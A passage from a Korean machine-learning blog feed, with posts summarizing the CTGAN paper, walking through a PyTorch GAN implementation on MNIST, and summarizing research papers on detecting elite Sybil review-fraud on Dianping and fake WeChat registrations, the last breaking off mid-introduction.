실제 데이터셋의 Train 부분을 통해 생성된 Synthetic Data를 기반으로 다양한 ML 모델(DT, SVM, MLP)을 학습시킨 결과와, 실제 데이터셋의 Test 부분을 기반으로 동일한 ML 모델을 학습시킨 결과와의 성능 차이를 비교하면 된다.

5.3. Benchmarking Results

이렇게 두가지 metric을 기반으로 실험을 진행한 결과는 [그림 10]과 같다.

[그림 10] benchmarking results

GM Sim과 BN Sim 은 각각 Likelihood fitness metric에서 사용된 simulated data가 Gaussian mixture simulated data와 Bayesian network simulated data를 사용했을 때 측정한 L(sync)와 L(test)를 나타냈으며, Real 항목은 Machine learning efficacy metric에서의 성능 지표를 나타낸다.

전체적으로 본 논문에서 제안한 TVAE와 CTGAN이 좋은 성능을 내는 것을 볼 수 있다.

하지만 TVAE의 경우 직접적으로 실제 데이터를 통해 generator를 학습시키고, GAN의 경우 Discriminator를 통해 간접적으로 generator를 학습시키기 때문에, Privacy 등의 보안 이슈가 있는 경우 CTGAN을 이용하는 것이 더 좋은 선택지가 될 수 있다.

5.4. Ablation Study

Ablation study는 본 논문에서 제안한 기능을 하나씩 제거해보면서, 해당 기능이 성능향상에 도움이 되었음을 증명하는 방법이다.

[그림 11]과 같이 본 논문에서 제안한 기능에대한 Ablation study를 수행한 결과, Mode-specific Normalization, conditional generator & training-by-sampling, Network architecture 등 모든 기능이 CTGAN의 성능을 향상시킨 것으로 나타났다.

[그림 11] Ablation study result

즉, Tabular 데이터를 synthesize 하는 과정에서 CTGAN에서 소개한 기법들이 큰 도움을 준다는 것이다.

6. Conclusion

본 논문에서는 discrete / continuous data가 혼재되어있는 tabular data에서 데이터를 생성하는 CTGAN을 제안하였다.
Mode-specific normalization을 통해 중구난방의 분포를 가지던 continuous 값을 NN 학습에 최적화된 형태로 normalize 하였으며, conditional generator와 training-by-sampling 을 통해 학습과정에서의 imbalance data 이슈를 해결하였다.

Reference

Lei Xu, Maria Skoularidou, Alfredo Cuesta-Infante, Kalyan Veeramachaneni, "Modeling Tabular data using Conditional GAN" , NIPS'19, 2019

[Pytorch] GAN 구현 및 학습

dong1 — Sat, 12 Mar 2022 18:15:33 +0900

1. 개요

https://github.com/godeastone/GAN-torch

Pytorch 로 구현한 GAN 전체 코드는 위 git repository에서 확인할 수 있다.

2. GAN

GAN은 2014년 Ian Goodfellow 님에 의해 개발되었다.

GAN 논문에 대한 자세한 정보는 아래 글을 참고하도록 하고, 이번에는 GAN의 전체적인 구조를 대략 살펴보고 코드로 구현하는데 집중을 해도록 하자.

https://ddongwon.tistory.com/117

[논문] Generative Adversarial Nets

논문 제목 : Generative Adversarial Nets 0. abstract 본 논문에서는 adversarial process를 통한 generative model을 estimate 하는 새로운 프레임워크, GAN을 제안한다. GAN에서는 동시에 2개의 모델을 학습시..

ddongwon.tistory.com

우선 GAN은 한마디로 Generator와 Discriminator를 adversarial 하게 잘 학습시켜 기존의 데이터셋과 유사한 데이터를 생성하도록 하는 생성모델이다.

Generator는 noise vector 'z' 을 input으로 받아서, 기존의 데이터셋과 유사한 확률 분포를 가지는 데이터 샘플을 output으로 뽑아내는 녀석이다.

Discriminator 는 실제 데이터셋에서 나온 데이터(real) 와, Generator에서 나온 데이터(fake)를 input으로 받아 이 둘을 최대한 real 과 fake로 classification 하는 녀석이다.

즉, Generator는 최대한 그럴듯한 데이터를 만들어내는게 목표고, Discriminator는 최대한 real 과 fake 데이터를 구분하려하는게 목표이다.

Discriminator는 D(x) -> 1(real), D(G(z)) -> 0(fake)로 학습시키고, Generator는 D(G(z)) 의 결과가 최대한 1(real)로 착각하도록 학습시킨다. 흔히 볼 수 있는 [그림 1]의 GAN의 loss 함수는 위 개념을 바탕으로 나온 것이다.

[그림 1] GAN objective function

3. 구현

그럼 이제 GAN을 어떻게 구현할 수 있을지 코드를 보며 이해해보자.

class Discriminator(nn.Module):
    def __init__(self):
        super(Discriminator, self).__init__()

        self.linear1 = nn.Linear(img_size, hidden_size2)
        self.linear2 = nn.Linear(hidden_size2, hidden_size1)
        self.linear3 = nn.Linear(hidden_size1, 1)
        self.leaky_relu = nn.LeakyReLU(0.2)
        self.sigmoid = nn.Sigmoid()

    def forward(self, x):
        x = self.leaky_relu(self.linear1(x))
        x = self.leaky_relu(self.linear2(x))
        x = self.linear3(x)
        x = self.sigmoid(x)
        return x

우선 Discriminator는 위와 같이 정의할 수 있다. 일반적인 multi layer neural network로 구성되어 있다.

총 3개의 Linear layer로 구성되어 있는데, 첫번째 layer에서는 MNIST 이미지 사이즈 (1 x 28 x 28 = 784)을 입력받고, 마지막 레이어에서는 classification을 위해 1개의 노드로 정리된다.

각 레이어 사이에는 activation function으로 leaky ReLU 함수가 사용되었으며, 마지막에는 확류로 표현하기 위해 sigmoid 함수가 사용되었다.

class Generator(nn.Module):
    def __init__(self):
        super(Generator, self).__init__()

        self.linear1 = nn.Linear(noise_size, hidden_size1)
        self.linear2 = nn.Linear(hidden_size1, hidden_size2)
        self.linear3 = nn.Linear(hidden_size2, img_size)
        self.relu = nn.ReLU()
        self.tanh = nn.Tanh()

    def forward(self, x):
        x = self.relu(self.linear1(x))
        x = self.relu(self.linear2(x))
        x = self.linear3(x)
        x = self.tanh(x)
        return x

Generator는 Discriminator와 반대로 구성되어 있다.

역시 총 3개의 Linear layer로 구성되어 있으며, 입력값으로 noise vector 'z'의 크기만큼의 노드가 사용되고, 마지막 layer에서는 실제 MNIST 데이터의 크기 (1 x 28 x 28 = 784) 개의 노드로 정리된다.

각 layer 사이에는 activation function으로 ReLU 함수가 사용되었으며, 마지막 layer 에는 tanh 함수가 사용되었다.

이제 Generator와 Discriminator를 정의했으니, 본격적으로 학습을 시작해보자.

criterion = nn.BCELoss()
d_optimizer = torch.optim.Adam(discriminator.parameters(), lr=learning_rate)
g_optimizer = torch.optim.Adam(generator.parameters(), lr=learning_rate)

우선 학습에 사용될 Loss function으로는 BCELoss를 사용하였으며, 국민 optimizor인 Adam을 사용하였다.

이때, genrator와 discriminator는 서로 따로따로 학습되므로 각각 optimizer를 구분지어 정의해주어야 한다.

for epoch in range(num_epoch):
    for i, (images, label) in enumerate(data_loader):

        # 라벨을 만들어 줍니다. 1 for real, 0 for fake
        real_label = 
        	torch.full((batch_size, 1), 1, dtype=torch.float32).to(device)
        fake_label = 
        	torch.full((batch_size, 1), 0, dtype=torch.float32).to(device)

        # MNIST dataset의 데이터를 flatten 하게 reshape 해줍니다.
        real_images = images.reshape(batch_size, -1).to(device)

이제 for문을 통해 각 epoch 마다 학습을 시켜주게 된다.

학습을 위해 [batch size, 1] 크기의 모두 1로 구성된 real label 의 tensor와 모두 0으로 구성된 fake label의 tensor를 만들어 주었다.

또한 [1 x 28 x 28] 크기의 MNIST 데이터를 [batch size, 784] 의 크기로 flatten 해주는 과정을 거쳤다.

        # +---------------------+
        # |   train Generator   |
        # +---------------------+

        # Initialize grad
        g_optimizer.zero_grad()
        d_optimizer.zero_grad()

        # fake image를 generator와 noize vector 'z' 를 통해 만들어주기
        z = torch.randn(batch_size, noise_size).to(device)
        fake_images = generator(z)

        # loss function에 fake image와 real label을 넘겨주기
        # 만약 generator가 discriminator를 속이면, g_loss가 줄어든다.
        g_loss = criterion(discriminator(fake_images), real_label)

        # backpropagation를 통해 generator 학습
        g_loss.backward()
        g_optimizer.step()

우선 noise vector 'z' 를 torch.randn 함수를 통해 랜덤한 값으로 채워준다.

이후 앞서 선언한 generator에 z를 넣어줌으로써 [28 x 28 = 784] 크기의 이미지 데이터를 생성하게 된다. 즉 G(z)는 Generator가 생성한 batch size 개수만큼의 이미지가 된다.

앞서 2장에서 설명했듯이 Generator는 D(G(z))의 성능을 낮추는 방향으로 학습된다.

따라서 loss 함수에 D(G(z))와 real label을 함께 넣어준다.

이런 과정을 통해 Generator의 성능이 높아지는 방향으로 학습이 진행되게 된다.

	# +---------------------+
        # | train Discriminator |
        # +---------------------+

        # Initialize grad
        d_optimizer.zero_grad()
        g_optimizer.zero_grad()

        # generator와 noise vector 'z'로 fake image 생성
        z = torch.randn(batch_size, noise_size).to(device)
        fake_images = generator(z)

        # fake image와 fake label, real image와 real label을 넘겨 loss 계산
        fake_loss = criterion(discriminator(fake_images), fake_label)
        real_loss = criterion(discriminator(real_images), real_label)
        d_loss = (fake_loss + real_loss) / 2

        # backpropagation을 통해 discriminator 학습
        # 이 부분에서는 generator는 학습시키지 않음
        d_loss.backward()
        d_optimizer.step()

다음으로 Discriminator를 학습시켜주자.

우선 앞서 했던거 같이 z를 generator에 통과시켜 fake image를 만들어준다.

D(G(z)) 값을 loss function에 fake label과 함께 넣어 fake loss를 구해주고, D(x) 값을 loss function에 real label과 함게 넣어 real loss를 구해준다.

이렇게 구한 두 fake / real loss를 평균내서 전체 discriminator 의 loss값을 구해준다.

이렇게 하면 Discriminator가 제대로 fake 와 real 이미지를 판단할 수 있는 방향으로 학습이 진행되게 된다.

이렇게 되면 한 epoch 의 학습이 끝나게 된다.

처음에는 generator가 터무니 없는 데이터를 생성하기 때문에 discriminator가 어렵지 않게 이를 분류할 수 있다. 그래서 d_loss 값은 작게 나오고, g_loss값은 크게 나온다.

하지만 학습이 진행될수록 d_loss값은 커지고 g_loss값은 점점 작아지는 것을 확인할 수 있다. 이는 Discriminator가 점점 진짜와 가짜 이미지를 판단하기 어려워지고, Generator가 점점 진짜같은 가짜 이미지를 생성해낸다는 뜻이다.

즉, GAN의 기존 의도와 딱 맞게 학습이 되어간다는 뜻이다.

실제 코드를 돌려보면 알 수 있겠지만, 대략 200 epoch 정도만 학습해줘도 [그림 2]와 같이 꽤나 그럴듯한 데이터가 생성되는 것을 확인할 수 있다.

[그림 2] epoch 별 generator가 생성한 MNIST 데이터

만약 Discriminator와 Generator를 조금 더 정교하게 설계하거나 batch normalization 등의 다양한 테크닉을 적용한다면 보다 정교하고 그럴듯한 데이터를 생성해낼 수 있을 것이다.

위 내용은 공부하며 정리한 것으로, 오류가 있을 수 있습니다.

[논문] Smoke Screener of Straight Shooter: Detecting Elite Sybil Attacks in User-Review Social Networks

dong1 — Tue, 8 Mar 2022 00:31:20 +0900

논문 제목 : Smoke Screener of Straight Shooter: Detecting Elite Sybil Attacks in User-Review Social Networks

0. Abstract

아마존과 같은 User-Review Social Network (URSN) 사이트에서 대량으로 fake account를 생성하고 평점을 조작하는 Sybil attack 이 최근 자주 발생하고 있다.

본 논문에서는 elite Sybil attack 이라는 용어를 다음과 같이 정의한다. 유기적으로 highly-rated accounts들을 생성해 겉보기에 trustworthy 하고 realist-lokking한 review들을 생성해내는 공격이다.

elite Sybil attack은 accounts들이 large scale을 이루며 sparsely-knit 하게 구성되어 기존의 탐지 시스템을 무력화 시킨다.

본 논문에서는 ELSEDET 이라 불리는 elite sybil attack 탐지 시스템을 제안한다. ELSEDET은 3단계로 구성되어 있는데, 1) 의심스러운 그룹을 분리한 뒤, 2) campaign window를 식별하고 3) campaign 에 포함된 elite Sybil user를 찾아낸다.

본 연구에서는 Dianping에서의 수십만개의 review를 대상으로 실험을 진행했으며, elite sybil attack의 파급력과 탐지 방안을 보였다.

1. Introduction

일반적인 Sybil attack과는 다르게 elite sybil attack은 이미 특정 사이트에서 높은 평판을 가지고 있는 accounts를, 리더의 지휘 하에 조직적으로 review를 조작한다. 따라서 elite sybil attack을 탐지하거나 방지하는 것은 매우 힘든 일이다.

기존의 Online Social Networks(OSNs) 에서의 sybil attack 방지는 대표적으로 두가지 방식을 사용한다. 1) account의 social network connectivity를 파악하는 방식과 2) accounts의 feature를 통해 ML classifier를 활용하는 방식
이러한 방식들은 URSN 에서는 잘 통하지 않는데 그 이유는 다음과 같다.

1) URSNs의 node들은 OSN 만큼 잘 연결되어있지 않다. (팔로워 등의 개념이 거의 없으므로) 따라서 graph connectivity 방식은 효과적이지 않다.

2) URSNs에서의 elite sybil attack은 정교한 리뷰를 남기거나 사진을 남기기 때문에 일반적인 OSN에서보다 탐지 방법이 복잡하다.

3) 일반적인 sybil attack과 다르게 elite sybil attacker는 전체 리뷰 중 일부분의 리뷰만 sybil attack에 사용한다. 따라서 aggregate 한 탐지 방식은 효과적이지 않다.

이러한 elite sybil attack을 탐지하기 위해, 본 연구팀은 여러 sybil workers들이 특정 task를 수행하는 Sybil campaigns 에 집중하였다. 이러한 campaigns들은 특정 시간에 발생되므로, 해당 시간에 rewview를 올린 사용자들은 모두 용의자선상에 있다.

용의자 중에서 실제 sybils를 판단하기 위해 장기적인 관점에서 바라보았을 때, 더 많은 campaigns에 참여할수록 sybils 일 확률이 높아진다는 점을 이용한다.

ELSIEDET은 3가지 단계로 동작한다.

1단계) sybil community를 탐지한다. elite sybil group의 행동을 분석하여 sybil community를 탐지한다.

2단계) Sybil campaign time window를 결정한다. 새로운 방식의 campaign 탐지 알고리즘을 통해 특정 campaign의 시작과 끝을 정의함으로써 time window를 결정한다.

3단계) elite sybil user를 찾아낸다. 새롭게 정의된 metric인 Sybilness를 통해, 참여자가 참여하는 정도를 scoring 하여 slite sybil user를 찾아낸다.

또한 본 논문에서 수행한 Contributions는 다음과 같다.
1) Dianping이라는 URSN의 Sybils 들은 일반적인 centralized or simple distributed 구조가 아닌 하이브리드한 구조로 진화하고 있음을 알아냄.
2) elite Sybil users라는 새로운 개념의 Sybils를 정의함.
3) elite Sybil이라 불리는 사람들의 행동 특징을 파악했으며, 조기에 Sybil campaigns를 탐지하고 경고할 수 있는 시스템을 제안하였다.
4) ELSIEDET가 현재 Dianping의 필터링 시스템을 보완하며, Dianping으로부터 인정받음.

2. Background

우선 Dianping은 중국의 대표적인 User-Review Social Network사이트로, 특이하게 어느정도 리뷰가 많고 '믿을만한' 사용자에게 'senior level user'라는 타이틀을 주는데 이 사람들이 sybil attack에 이용되는 사람들이다.

sybil attack은 과거에는 단순히 인터넷 서비스에 타격이나 무리를 주는 공격에서 시작되어, 최근에는 트위터, 아마존과 같은 유명한 사이트에 금전적으로 피해를 입히기 시작했고, 그 방법도 점점 정교화되어 탐지에도 어려움을 겪고 있다. 특히 최근에는 URSN 사이트를 타깃으로 실제 소비자들에게도 피해를 입히고 있다.

3. Dissecting Elite Sybil Attacks

3.1. Terminology

1) Store
Store 'S'는 Dianping에서 많은 수의 리뷰를 가지고 있는 특정 웹사이트이다.

2) Community
Community 'C'는 특정 store에 리뷰와 평점을 남기는 사람들의 집합이다. 정상적인 사람들로 구성된 benign communities와 malicious한 사람들로 구성된 Sybil communities로 분류할 수 있다.

3) Campaign
(C, S, T_s, T_e) = (Community ID, Store ID, start Time, end Time)으로 표현되는 Campaign은 특정 community C의 사람들이 store S에 특정 시간동안 S의 prestige를 높이기 위해 리뷰를 다는 행위를 의미한다.

3.2. Elite Sybil Users

일반적인 Sybil user와는 다르게 Elite Sybil user들은 작정하고 Sybil 관련 task만 수행하는 것이 아니라, 평소에는 정상적으로 활동하다 (금전적인) 보상 등을 위해서 일부분 Sybil task를 수행하는 것이다. 따라서 이를 탐지하는 것은 기술적으로 굉장히 어렵다.

Elite Sybil user는 1) Sybil task에 속하지 않고 그냥 campaigns를 사용하기 위해 리뷰를 올리는 사용자와 2) 정상적인 사용자에게 속한 계정이라 account rating이 높지만, 보상을 위해 특정 campaign의 Sybil task 를 수행하는 계정이다.

또한 여러 사용자나 조직에 의해 관리되는 Sybil attack과 다르게 Elite Sybil user는 sybil leader라 불리는 특정 조직에 의해 관리된다.

3.3. Anatomy of Elite Sybil Attack Operations

본 연구팀에서 실제 Elite Sybil attack을 수행하는 집단에 들어가 그들의 조직을 파악해본 결과 (그림 1)과 같은 구조로 동작하고 있음을 알아냈다.

[그림 1] architecture of a Sybil organization

우선 자신의 상품의 평점이 오르길 원하는 Customers가 Agents에게 요청하면 Agents는 여러 Leader를 통해 Elite Sybil Accounts를 고용하고 그들에게 보상을 주는 형태로 동작하게 된다.

여기서 Agents는 Sybil campagins를 생성해내고, 실제 Elite Sybil accounts를 고용하고 관리하는 것은 Leader의 역할이다.
Elite Sybil attack의 work flow 는 아래 [그림 2]와 같다.

[그림 2] workflow of Elite sybil attack

work flow는 크게 (a) Leader의 가이드에 맞춰 elite Sybil workers들이 직접 리뷰를 작성하는 Leader-supervised model 와 (b) Leader가 직접 리뷰를 workers에게 주고, workers들이 실제 사이트에 리뷰를 작성하는 Leader hands-on model로 분류할 수 있다.

실제 elite Sybil account를 생성하기 위해서는 account 가 생성된 후 성별, 생일 등의 프로필 정보를 Dianping 상에 업로드 해야하며, 정상적이고 퀄리티 높은 리뷰들을 여러개 작성하여 account의 rating을 올리는 작업이 선행되어야 한다.

4. ELSIEDET: Design and Implementation

앞서 말했듯이 ELSIEDET은 크게 3가지 단계로 동작한다.

1) detecting Sybil communities

2) determining campaign time windows

3) detecting elite Sybil users

System overview

4.1. Sybil community detection

Sybil community detection은 크게 3가지 단계로 구성된다.

1) Constructing Sybil Social Links via Collusive reviews

우선 특정 community에 속한 사용자 간에 Sybil social links를 그려야 한다.

그렇다고 community에 속한 모든 사용자를 다 이을수는 없고, 모든 사용자 쌍에 대하여 [그림 3]의 Sim(u, v) 수식을 계산하게 된다.

[그림 3] Sim(u, v)

[그림 3]에서 R(u) = {(U, T1, S1, L1), (U, T2, S2, L2), ..., (U, Tn, Sn, Ln)} 으로 정의되는데, 각 튜플들은 사용자 u가 작성한 리뷰이다. U는 UserID, T는 리뷰 작성 시각, S는 리뷰 작성한 StoreID, L은 리뷰의 rating 정보이다.

해당 R(u)에서 두 리뷰가 같은 store에 작성되었고, 비슷한 시간대에 작성되었고, 별점이 1 또는 5점일 경우에만 P_u(k) = 1 을 만족하며, 나머지 경우에는 모두 0을 만족한다.

이렇게 [그림 3]과 같은 수식을 통해 Similariy를 구하고, 해당 값이 threshold 값을 넘어설 경우에, 두 user간에 Sybil social links를 그어주며, 두 user를 neighbors 라고 부르게 된다.

2) Community Clustering via the Louvain Method

다음으로 그어진 Sybil social links를 기반으로 Louvain method를 통해 Community의 users들을 Clustering 하는 과정을 거친다.

하지만, 단순히 Louvain-detected communities를 통해 수많은 Sybil users를 찾는 것은 충분치 않다고 생각이 되어, 다음 단계에서 Louvain-detected communities에 supervised ML 을 적용하였다.

3) Sybil Community Classification

clustering된 communities 중에서 benign 과 sybils 를 구별하기 위해 supervised ML을 적용하게 된다. 해당 ML 과정에 사용되는 features는 [그림 4]와 같다.

[그림 4] Types of features

features는 총 3가지 카테고리에 8가지 features로 구성되어 있다.
전체 score의 분산을 나타내는 score deviation은 Sybils일 경우 더 커지게 된다. 또한 Entropy of the number of reviews in each chain stores 값은 발생한 리뷰의 개수를 측정함으로써 얻어질 수 있는, 각 chain store에 포함된 정보량의 기댓값이다.

또한 sybil community와 benign community는 [그림 5]와 같이 굉장히 다른 양상을 띄고 있기 때문에, Average similarity, Global clustering coefficient 의 features를 채택하게 되었다.

[그림 5] Comparison of the graph structure between a benign and Sybil community

4.2. Campaign Window Detection

앞서 찾은 Sybil community 중에서 Sybil Campaign이 실행되는 시간 구역을 나타내는 Campaign Window를 찾기 위해, 리뷰의 rating이 갑자기 증가하는 때를 찾는 burst detection algorithm (예를 들면 Bayesian change point detection algorithm) 을 사용할 수도 있지만, 특정 프로모션 할인과 같은 이벤트때문에 rating이 갑자기 증가할 수도 있기 때문에 해당 방식은 문제가 있다.

본 연구팀에서는 이를 해결하기 위해 anomaly collaborative behaviors를 탐지하는 방향으로 진행하였다. 이를 위해 Sparse Review Interval을 찾아 쳐내는 방식을 채택하였다.

즉, 특정 store에 달린 리뷰를 주 별로 표시한 다음, 리뷰가 거의 없는 sparse review interval을 양 옆에서부터 잘라내서 더이상 sparse review interval 이 없어질 때까지 반복한다.

해당 알고리즘은 [그림 6]과 같으며, [그림 7]과 같이 전체 기간을 Sparse review interval 과 Campaign time window로 나눌 수 있게된다.

[그림 6] Detecting Campaign Time Windows algorithm

[그림 7] example of time window detection

4.3. Elite Sybil User Detection

이제 얻어낸 Campaign Window 와 해당 Window에 참여한 사용자들 정보를 가지고 participation rate와 Sybilness 를 얻어내면 된다.
우선 participation rate를 계산하기 위해서는 [그림 8]에서 볼 수 있듯이 Nc(k)와 Nc_max를 구해야 한다.

[그림 8] Nc(k) & Nc_max

Nc(k)는 community C의 k번째 time window에서 작성된 누적 리뷰 수이고, Nc_max는 C의 전체 time window 중 가장 많은 리뷰가 작성된 수 이다.

이제 k번째 time window에서 작성된 누적 리뷰 수 Nc(K)를 Nc_max로 나누어줌으로써 normalize를 해주게 된다. 이 normalize된 값 Pc(k) = Nc(k) / Nc_max 로 표현된다. 이 Pc(k) 값은 k번째 window의 중요도를 나타내주는 계수로 볼 수 있다.

또한 Nu_c(k)를 k번째 window에서 사용자 u가 작성한 리뷰의 개수라고 할 경우, community C에서 사용자 u의 weighted sum은 [그림 9]와 같이 나타낼 수 있다. 사용자 u의 weighted sum은 특정 Community C에서 사용자 u의 비중을 나타내주는 계수로 볼 수 있다.

[그림 9] weighted sum of user u

이제 이 Nu_c(k) 값을 sigmoid 함수에 넣음으로써 community C에 대한 사용자 u의 participation rate (시그마 u) 을 구할 수 있다. participation rate를 구하는 수식은 [그림 10]과 같다.

[그림 10] participation rate

Sybilness score는 사용자가 elite Sybil user일 가능성을 나타내주는 지표이다. 앞서 살펴본 participation rate은 특정 community C에 대한 사용자 u의 참여도를 나타낸 지표이므로 만약 elite Sybil user가 여러 community에 조금씩 참가할 경우, participation rate은 작게 나타날 것이다.

이를 해결하기 위해 Sybilness score를 고안하였으며, Sybilness score f() 는 단순히 모든 community C에 대하여 participation rate와 Nu_C를 더한 값이다. 이를 수식으로 나타내보면 [그림 11]과 같다.

[그림 11] Sybilness score

5. Evaluation

실험에 사용된 데이터셋은 직접 Dianping 사이트의 여러 store와 review를 크롤링 하여 획득하였다. 총 32,933개의 store, 10,541,931개의 review, 3,555,154개의 users를 획득할 수 있었다.

community를 라벨링 하는데는 경험적인 직관에 의거한 기준 3가지를 두고 사람이 직접 labelling하였다.
ELSIEDET을 사용한 결과 데이터셋에서 총 710개의 community를 탐지할 수 있었다.

특정 community가 sybil 한지 benign 한지 판단하기 위해 다양한 ML 모델을 적용한 결과 [그림 12]와 같은 결과를 얻을 수 있었다.

[그림 12] Classification performance

그 결과 SVM 모델을 사용하고 5-fold cross-validation 을 사용한 모델이 가장 좋은 성능을 뽑아냄을 알 수 있었다.
다음으로, Elite Sybil user를 탐지하는데에는 두가지 기준을 적용시켰다.

1) 사용자 u가 어느 community에도 속해있지 않으며

2) 사용자의 user participation rate 시그마u가 0.5를 넘는 경우이다.

그 결과 총 12,292개의 elite Sybil users를 탐지할 수 있었다. 단순히 binary classification을 하는게 아니라, sybilness score를 기준으로 정렬하여 보여준다.

6. Measurement and analysis

일반적인 Sybil users 와 비교해보았을때 elite Sybil users는 [그림 13]과 같은 경향을 띈다.

[그림 13] Experiment result

우선 suspicious reviews 수는 Elite Sybil users - Sybil users - benign users 순으로 많았다. 이는 일반적인 Sybil users는 새롭게 account를 생성하고 바꾸는 것이 가능하기 때문에 elite Sybil users에 비해 낮게 나온 것으로 보인다.

또한 Percentage of fake reviews는 Regular Sybils 에 비해 elite Sybils가 훨신 낮게 나왔다. 이는 elite Sybil attack의 정의에 의하면 당연한 결과이다.

마지막으로 filtered 된 reviews의 비율은 Regular Sybils - elite Sybils - benign users 순으로 많았다. 이는 elite Sybils 가 일반적인 Sybils에 비해 필터링될 확률이 적다는 것을 의미한다.

또한 본 연구팀은 chain store 역시 Sybil attacks를 사용한다는 것을 밝혔으며, 7-day slide window를 사용해 elite Sybil users를 파악하고 이를 통해 조기에 elite Sybil attacks를 파악하는 방안 또한 제안하였다.

[그림 14]를 보면 3명의 elite Sybil users가 각각 ELSIEDET과 Dianping의 Sybil detection system 을 통해 필터링된 정도를 알 수 있다.

[그림 14] Different detection results for elite Sybil users

이를 통해 Elite Sybil users가 수많은 양의 리뷰를 올리면 aggregate nehavioral-based clustering 방식의 user activity similarity를 계산하는 방식의 탐지 시스템을 잘 우회하는 것으로 나타났다.

또한, Dianping의 Sybil 탐지 시스템은 너무 민감하여 falsely filtered 하는 경우가 많았다. 이는 [그림 14]의 (c)를 보면 알 수 있다.

7. Discussion and Limitation

우선 Sybilness score에 따라서 의심스러운 사용자에 대한 weight 를 바꿔주면 Sybil attack으로 인한 부정적인 영향을 완화시켜줄 수 있다. 예를들어 의심이 많이가는 사용자에게 더 낮은 weight를 할당해주면, Sybil organization은 rating을 조작하기 더 어려워질 것이다.

또한 elite Sybil users를 모두 찾으려는 것보다, Sybilness score가 높은 몇명의 사용자를 찾고, 해당 사용자가 참여해있는 그룹을 조사하면 보다 효과적으로 elite Sybil users를 탐지할 수 있다.

반면 본 연구팀에서는 Dianping 상에서 users 간의 social link를 조사하지 않았던 점, elite Sybil user가 여러 campaign에 조금씩 참여하는 경우에는 회피될 가능성이 있다는 점, 다른 URSN에 대해서는 실험하지 못했던 점을 한계로 꼽았다.

9. Conclusion

본 논문에서는 URSNs에 대해 elite sybil attack의 구조를 파악하고, 이를 탐지하고 조기에 필터링할 수 있는 시스템을 제안하였다. 또한 실제로 다양한 chain store에서도 자신들의 평점을 조작하기 위해서 elite sybil attack을 사용하고 있음을 보였다.
또한 temporal patterns를 가지고 정교하게 조작하는 것이 공격자가 회피하지 못하게 만드는 key임을 강조하며 본 논문을 마쳤다.

Reference

Haizhong Zheng, Minhui Xue, Hao Lu, Shuang Hao, Haojin Zhu, Xiaohui Liang, Keith Ross, "Smoke Screener or Straight Shooter: Detecting Elite Sybil Attacks in User-Review Social Networks." , arXiv e-prints, arXiv-1709, 2017

[논문] Detecting fake accounts in online social networks at the time of registrations

dong1 — Sat, 5 Mar 2022 01:51:31 +0900

논문 제목 : Detecting fake accounts in online social networks at the time of registrations

0. abstract

online social networks에서 수많은 fake accounts를 생성해 악용하는 sybil attack이 자주 발생하고 있다.

기존의 sybil detection 방식은 너무 rich한 content, behavior, social graphs 를 이용하여 탐지 과정에서 큰 delay를 발생시킨다는 문제가 존재한다.

이에 본 논문에서는 Ianus 라 불리는 sybil detection 방식을 제안한다.

Ianus는 계정이 등록되는 단계에서 탐지하기 때문에 보다 sybil attack에 대한 보다 빠른 대처가 가능하다.

우선 중국에서 최대 규모의 social network 서비스인 WeChat에서의 registration datase을 사용하였다. 해당 데이터셋에서는 Sybils 에 대한 label이 기록되어 있다. 본 연구진은 Sybils와 benign users의 registration pattern을 측정하는 방안을 고안하였다.

앞서 측정한 결과를 바탕으로 graph inference problem 방식으로 sybil detection 모델을 고안하였다. graph 모델을 통해 heterogeneous 한 feature들을 integrate 할 수 있으며, 각 계정마다 feature를 이용해 graph를 생성하여 sybils 들끼리 얼마나 밀집되어있고, benign user들은 얼마나 sparse 하게 위치해있는지를 파악함으로써 Sybils를 탐지하게 된다.

Ianus 는 WeChat registration 데이터셋을 통해 evaluation을 진행하게 되며, WeChat은 Ianus를 통해 새로 등록하는 account에서 Sybils를 탐지하게 된다. 그 결과 Ianus가 400K개 이상의 registration account를 검사하고, 약 96% 이상의 정확도를 보임을 알 수 있었다.

1. Introduction

트위터 등과 같은 social network 서비스에서 fake account들로 인한 다양한 문제들이 발생하고 있다.

기존의 sybil detection 방식들은 content(URL in tweets), behavior(clickstream), social graphs(friendship graphs) 등의 방식을 통해 Sybils를 탐지하고 있다.

하지만 해당 방식들은 delay가 너무 심해, 탐지하기 전에 이미 다양한 malicious task들을 저질러버리는 경우가 많다. 따라서 본 연구에서는 registration 단에서 sybil attack을 탐지하는 방안을 제안한다.

기존에도 CAAPTCHA 등을 통해 registration 단에서 fake account를 탐지하는 방안들이 있지만, 쉽게 우회된다는 문제가 항상 존재해왔다. 이를 해결하기 위해 첫번째로, 본 연구에서는 WeChat registration 데이터셋을 사용한다.

해당 데이터셋에는 770K 개의 benign users, 647K 개의 sybils account 데이터로 구성되어있다.

각 account 데이터에는 IP address, phone number, device ID, nickname 등의 정보가 담겨있다.

이를 통해 sybils 들이 synchronized 된 패턴, 가령 같은 IP prefix 사용과 같은 것을 이용한다는 것을 알 수 있다. 하지만 이 정보만 가지고는 완벽하게 탐지할 수 없기 때문에 보다 심도있는 패턴 분석이 필요하다.

두번째로, 확보한 패턴 분석 결과를 이용해 sybils를 탐지하는 시스템인 Ianus를 고안하였다. 가장 중요한 부분은 registration data에 있는 synchronized하고 abnormal한 패턴들이 heterogeneous한데, 이를 integrate 하는 것이다.

Ianus에서는 integration을 위해 graph inference techniques를 사용하였다. synchronized 하고 abnormal한 registration 패턴들을 이용해 weighted graph를 만들고, graph를 분석해 sybils를 분석하는 것이다.

graph에서 각 노드는 account 이다. 따라서 sybil node끼리는 densly하게 연결되어있을 것이고, benign node끼리는 sparse 하게 연결되어 있을 것이다.

이러한 목적을 달성하기 위해 Ianus는 3가지 단계를 거친다.

1) feature extraction 2) graph building 3) Sybil detection

feature extraction 단계에서는 우선 2개의 account를 짝지은 후, 해당 쌍의 account의 비슷한 정도를 나타내는 synchronization based feature와 정상적이지 않은 정도를 나타내는 anomaly based features를 추출한다.

예를들어 한쌍의 account가 같은 device를 쓰는 경우 synchronization feature에서 탐지될 것이며, 같은 device를 서로 다른 account 를 만드는데 쓰는게 정상적이지 않으므로 anomaly based feature에서 확인될 것이다.

graph building 단계에서는 앞서 생성한 synchronization based feature와 anomaly based feature 를 기반으로 account들 간의 weighted grpah를 생성할 것이다. 특히 각 account 쌍에게 feature 값을 기반으로 'sync-anomaly score'를 매길 것이다.

따라서 만약 한쌍의 account가 서로 synchronized 하거나 anomaly한 패턴을 가질 경우, sync-anomaly score가 높게 나타날 것이다.

